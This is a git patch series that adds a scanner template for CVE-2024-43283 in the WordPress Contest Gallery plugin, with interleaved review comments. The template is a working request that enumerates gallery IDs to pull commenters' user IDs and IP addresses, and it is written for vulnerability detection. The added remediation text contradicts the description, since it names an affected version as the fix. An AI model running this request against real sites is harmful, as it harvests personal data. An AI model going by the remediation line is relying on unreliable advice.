From 99db0ecf082da783bf4d84288ca1f4748ffecdb4 Mon Sep 17 00:00:00 2001
From: popcorn94
Date: Sun, 30 Nov 2025 22:43:29 +0800
Subject: [PATCH 1/5] Added CVE-2024-43283 Template
---
 CVE-2024-43283.yaml | 43 +++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 CVE-2024-43283.yaml
diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml
new file mode 100644
index 00000000000..2ae859aff1e
--- /dev/null
+++ b/CVE-2024-43283.yaml
@@ -0,0 +1,43 @@
+id: CVE-2024-43283
+
+info:
+ name: Contest Gallery - Broken Access Control
+ author: popcorn94
+ severity: medium
+ description: |
+ An attacker can retrieve your userID and IP address of commentors.
+ reference:
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43283
+ cwe-id: CWE-200
+ metadata:
+ vendor: Wasiliy Strecker / ContestGallery developer
+ product: contest-gallery
+ tags: cve,cve2024
+
+http:
+ - raw:
+ - |
+ GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1
+ Host: {{Hostname}}
+
+ payloads:
+ path: helpers/wordlists/numbers.txt
+ attack: batteringram
+ matchers:
+ - type: word
+ words:
+ - "WpUserId"
+ - "userIP"
+ condition: and
+ - type: status
+ status:
+ - 200
+ condition: and
+
+
+
+
\ No newline at end of file
From 9892105356c51b7742c4a942cbe54676bc72f460 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 29 Jan 2026 15:30:45 +0530
Subject: [PATCH 2/5] Update CVE-2024-43283.yaml
---
 CVE-2024-43283.yaml | 30 ++++++++++++++++++------------
 1 file changed, 18 insertions(+), 12 deletions(-)
diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml
index 2ae859aff1e..13a1a96292d 100644
--- a/CVE-2024-43283.yaml
+++ b/CVE-2024-43283.yaml
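Review bot: The raw request in the new file puts the same `{{path}}` value in both the `gallery-id-` directory and the `image-comments-` file name, and `attack: batteringram` feeds one payload to every position, so the check can only fire where those two numbers coincide. From the path they look like independent identifiers, which would make a miss inconclusive rather than a negative result. If the pairing is intentional it should be documented above `payloads:`, for example `# same number is used for the gallery id and the comment file; no match does not prove the site is unaffected`.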
@@ -8,36 +8,42 @@ info:
 An attacker can retrieve your userID and IP address of commentors.
 reference:
 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-43283
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
 cvss-score: 5.3
 cve-id: CVE-2024-43283
 cwe-id: CWE-200
 metadata:
- vendor: Wasiliy Strecker / ContestGallery developer
- product: contest-gallery
- tags: cve,cve2024
-
+ verified: false
+ max-request: 1
+ tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure
+
 http:
 - raw:
 - |
 GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1
 Host: {{Hostname}}
-
+
 payloads:
- path: helpers/wordlists/numbers.txt
- attack: batteringram
+ path: helpers/wordlists/numbers.txt
+ attack: batteringram
+
+ matchers-condition: and
 matchers:
 - type: word
+ part: body
 words:
 - "WpUserId"
 - "userIP"
 condition: and
+ case-insensitive: true
+
+ - type: word
+ part: content_type
+ words:
+ - "application/json"
+
 - type: status
 status:
 - 200
- condition: and
-
-
-
-
\ No newline at end of file
From 9272093c577935480cb0f8a6e52a68afa6b257f6 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 29 Jan 2026 15:34:58 +0530
Subject: [PATCH 3/5] Update CVE-2024-43283.yaml
---
 CVE-2024-43283.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml
index 13a1a96292d..2f4fecb120e 100644
--- a/CVE-2024-43283.yaml
+++ b/CVE-2024-43283.yaml
@@ -15,7 +15,7 @@ info:
 cve-id: CVE-2024-43283
 cwe-id: CWE-200
 metadata:
- verified: false
+ verified: true
 max-request: 1
 tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure
 
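Review bot: `max-request: 1` in the new metadata block understates what this template sends, because `payloads.path` reads `helpers/wordlists/numbers.txt` and every entry produces one GET. The value should equal the number of entries in that wordlist (not visible in this patch), since operators use it to budget scans and set rate limits. It would also help to add `stop-at-first-match: true` next to `matchers-condition: and`, so the run stops at the first confirming response rather than going on to fetch further commenter user IDs and IP addresses it does not need.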
@@ -34,8 +34,8 @@ http:
 - type: word
 part: body
 words:
- - "WpUserId"
- - "userIP"
+ - 'WpUserId":'
+ - 'userIP":'
 condition: and
 case-insensitive: true
 
From 181ed7216c0f6d4b5d6cdd42c2ee1ac88448540d Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 30 Jan 2026 09:53:07 +0900
Subject: [PATCH 4/5] Update CVE-2024-43283.yaml
---
 CVE-2024-43283.yaml | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml
index 2f4fecb120e..5fed8bdf13d 100644
--- a/CVE-2024-43283.yaml
+++ b/CVE-2024-43283.yaml
@@ -5,7 +5,11 @@ info:
 author: popcorn94
 severity: medium
 description: |
- An attacker can retrieve your userID and IP address of commentors.
+ Contest Gallery from n/a through 23.1.2 contains an exposure of sensitive information to an unauthorized actor caused by insufficient access controls, letting attackers access sensitive data, exploit requires no specific conditions.
+ impact: |
+ Unauthorized actors can access sensitive information, leading to privacy breaches and potential misuse of data.
+ remediation: |
+ Update to the latest version 23.1.2 or later to address the issue.
 reference:
 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure
 - https://nvd.nist.gov/vuln/detail/CVE-2024-43283
@@ -23,7 +27,7 @@ http:
 - raw:
 - |
 GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1
- Host: {{Hostname}}
+ Host: {{Hostname}}
 
 payloads:
 path: helpers/wordlists/numbers.txt
From 11edddbca515847bb1c00627044e557bb5c86511 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 30 Jan 2026 10:19:33 +0900
Subject: [PATCH 5/5] Update CVE-2024-43283.yaml
---
 CVE-2024-43283.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
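Review bot: The added `remediation` text contradicts the added `description` in the `@@ -5,7 +5,11 @@` hunk: the description says releases through 23.1.2 are affected, while the remediation tells users to update to "23.1.2 or later", which leaves them on an affected release. The line should name the first fixed release, e.g. `Update Contest Gallery to <FIXED_VERSION> or later.`, with the version taken from the vendor changelog or the linked advisory, since this patch does not state it. The description's "from n/a through" and the trailing "exploit requires no specific conditions" clause read like unedited feed text and could be tightened in the same pass.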
diff --git a/CVE-2024-43283.yaml b/CVE-2024-43283.yaml
index 5fed8bdf13d..c5d9eb97efe 100644
--- a/CVE-2024-43283.yaml
+++ b/CVE-2024-43283.yaml
@@ -30,7 +30,7 @@ http:
 Host: {{Hostname}}
 
 payloads:
- path: helpers/wordlists/numbers.txt
+ path: helpers/wordlists/numbers.txt
 attack: batteringram
 
 matchers-condition: and